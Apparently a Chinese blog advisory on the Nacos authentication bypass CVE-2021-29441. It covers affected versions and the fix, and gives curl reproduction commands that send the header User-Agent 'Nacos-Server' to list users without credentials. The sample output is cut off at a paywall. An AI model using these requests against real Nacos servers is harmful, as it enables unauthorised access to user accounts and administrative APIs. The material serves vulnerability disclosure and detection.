Nacos是一个由Alibaba开发的服务发现和配置管理平台,存在User-Agent认证绕过问题,允许攻击者在特定条件下调用任意API。漏洞影响Nacos-common版本低于1.4.1。复现该漏洞可通过设置User-Agent为Nacos-Server绕过认证。修复方案是将Nacos-common升级到1.4.1以上并关闭User-Agent白名单设置。
Nacos 存在认证绕过漏洞(CVE-2021-29441)
漏洞描述:
nacos是中国阿里巴巴(Alibaba)的一个动态服务发现、配置和服务管理平台。该软件支持基于 DNS 和基于 RPC 的服务发现,可提供提供实时健康检查,阻止服务向不健康的主机或服务实例发送请求等功能。
Nacos 1.4.1对于User-Agent绕过安全漏洞的serverIdentity key-value修复机制存在实现缺陷,当用户通过/nacos/v1/auth/users/?username=test&password=test访问时,users后的/会导致鉴权被绕过,攻击者仍可调用任意API,进行用户创建、查看等操作。
user-agent为"Nacos-Server"时跳过认证。
影响范围:
com.alibaba.nacos:nacos-common@(-∞, 1.4.1)
复现方式/漏洞检测
请求接口
curl --location 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9' \
--header 'User-Agent: Nacos-Server'
请求数据与返回数据
[root@localhost ~]# curl -iv --location 'http://172.16.5.125:31500/nacos/v1/auth/users?pageNo=1&pageSize=9' --header 'User-Agent: Nacos-Server'
* About to connect() to 172.16.5.125 port 31500 (#0)
* Trying 
最低0.47元/天 解锁文章
扫一扫
1364
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
